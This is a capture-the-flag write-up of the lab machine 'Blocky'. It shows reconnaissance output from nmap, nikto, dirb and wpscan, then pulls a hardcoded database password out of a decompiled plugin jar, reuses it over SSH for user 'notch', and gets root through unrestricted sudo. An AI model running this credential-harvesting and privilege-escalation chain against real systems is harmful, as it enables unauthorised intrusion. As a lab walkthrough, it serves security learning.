Difficulty Rating:

Machine: Blocky
OS: Linux
IP: 10.10.10.37/38

  • Nmap
$ nmap -Pn -sV -T4 10.10.10.38

Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-24 17:25 IST
Nmap scan report for 10.10.10.38
Host is up (0.15s latency).
Not shown: 996 filtered ports
PORT     STATE  SERVICE VERSION
21/tcp   open   ftp     ProFTPD 1.3.5a
22/tcp   open   ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp   open   http    Apache httpd 2.4.18 ((Ubuntu))
8192/tcp closed sophos
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.61 seconds
  • Nikto
$ nikto -h http://10.10.10.38
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.38
+ Target Hostname:    10.10.10.38
+ Target Port:        80
+ Start Time:         2017-07-24 17:28:08 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ RFC-1918 IP address found in the 'link' header. The IP is "192.168.2.70".
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://192.168.2.70/index.php/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80 
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /phpmyadmin/: phpMyAdmin directory found
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wp-login.php: Wordpress login found
+ 7667 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time:           2017-07-24 17:56:22 (GMT5.5) (1694 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

  • Dirb
$ dirb http://10.10.10.38

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Jul 24 18:39:22 2017
URL_BASE: http://10.10.10.38/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.38/ ----
+ http://10.10.10.38/index.php (CODE:301|SIZE:0)                                    
==> DIRECTORY: http://10.10.10.38/javascript/                                                     
==> DIRECTORY: http://10.10.10.38/phpmyadmin/                                                           
==> DIRECTORY: http://10.10.10.38/plugins/                                                         
+ http://10.10.10.38/server-status (CODE:403|SIZE:299)                                                          
==> DIRECTORY: http://10.10.10.38/wiki/                                                                                
==> DIRECTORY: http://10.10.10.38/wp-admin/                                                               
==> DIRECTORY: http://10.10.10.38/wp-content/                                                               
==> DIRECTORY: http://10.10.10.38/wp-includes/                                                             
+ http://10.10.10.38/xmlrpc.php (CODE:405|SIZE:42)
  • After checking /plugins directory, there’s BlockyCore.jar which looks interesting.
  • Download jar and decompile it. This is how it looks after decompiling:
package com.myfirstplugin;

public class BlockyCore {
  public String sqlHost = "localhost";
  public String sqlUser = "root";
  public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";
  

  public BlockyCore() {}
  

  public void onServerStart() {}
  
  public void onServerStop() {}
  
  public void onPlayerJoin()
  {
    sendMessage("TODO get username", "Welcome to the BlockyCraft!!!!!!!");
  }
  
  public void sendMessage(String username, String message) {}
}
  • We got a password to a mysql database. We need to find the username

  • After running wpscan, we get:

$ sudo wpscan --url http://10.10.10.38 --enumerate u
[sudo] password for anton: 
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.9.2
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://10.10.10.38/
[+] Started: Mon Jul 24 20:04:47 2017

[!] The WordPress 'http://10.10.10.38/readme.html' file exists exposing a version number
[+] Interesting header: LINK: <http://192.168.2.70/index.php/wp-json/>; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under: http://10.10.10.38/xmlrpc.php
[!] Upload directory has directory listing enabled: http://10.10.10.38/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://10.10.10.38/wp-includes/

[+] WordPress version 4.8 (Released on 2017-06-08) identified from meta generator, links opml

[+] WordPress theme in use: twentyseventeen - v1.3

[+] Name: twentyseventeen - v1.3
 |  Latest version: 1.3 (up to date)
 |  Location: http://10.10.10.38/wp-content/themes/twentyseventeen/
 |  Readme: http://10.10.10.38/wp-content/themes/twentyseventeen/README.txt
 |  Style URL: http://10.10.10.38/wp-content/themes/twentyseventeen/style.css
 |  Referenced style.css: http://192.168.2.70/wp-content/themes/twentyseventeen/style.css
 |  Theme Name: Twenty Seventeen
 |  Theme URI: https://wordpress.org/themes/twentyseventeen/
 |  Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a...
 |  Author: the WordPress team
 |  Author URI: https://wordpress.org/

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Enumerating usernames ...
[+] Identified the following 1 user/s:
    +----+-------+---------+
    | Id | Login | Name    |
    +----+-------+---------+
    | 1  | notch | Notch – |
    +----+-------+---------+

[+] Finished: Mon Jul 24 20:05:05 2017
[+] Requests Done: 81
[+] Memory used: 17.602 MB
[+] Elapsed time: 00:00:17
  • We got the user and it’s password. Let’s ssh.

  • To get root

$ ssh [email protected]
[email protected]'s password: 
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

7 packages can be updated.
7 updates are security updates.


Last login: Mon Jul 24 10:49:53 2017 from 10.10.15.191
[email protected]:~$ id
uid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
[email protected]:~$ sudo -lU notch
[sudo] password for notch: 
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL
[email protected]:~$ sudo su
[email protected]:/home/notch# ls /root
root.txt
[email protected]:/home/notch# cat /root/root.txt
XXXXXXXXXXX
User and Root owned!!

Share the fun!